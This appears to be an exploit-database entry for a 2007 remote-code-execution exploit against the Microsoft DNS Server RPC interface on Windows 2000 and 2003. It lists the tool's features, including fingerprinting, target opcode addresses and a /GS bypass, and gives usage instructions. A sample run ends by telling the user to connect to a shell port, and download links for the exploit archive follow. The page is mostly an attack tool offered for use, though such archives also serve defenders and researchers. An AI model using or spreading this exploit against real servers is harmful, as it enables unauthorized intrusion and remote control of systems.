Microsoft Dns Server local & remote RPC Exploit code

vendor:

Microsoft Dns Server

by:

Andres Tarasco & Mario Ballano

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Microsoft Dns Server

Affected Version From: Windows 2000 server SP4

Affected Version To: Windows 2003 SP2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 2000 server SP4 and Windows 2003 SP2

Microsoft Dns Server local & remote RPC Exploit code

The exploit targets the Microsoft Dns Server and allows for local and remote RPC exploitation. It features OS fingerprinting, supports Windows 2000 server and Windows 2003 server, and includes universal local exploits for Win2k and Win2k3. The exploit uses the Microsoft RPC API.

Mitigation:

Apply the latest security patches and updates from Microsoft.

Source

Exploit-DB raw data:

  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )


D:\ProgramaciÃƒÂ³n\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\ProgramaciÃƒÂ³n\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip 
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]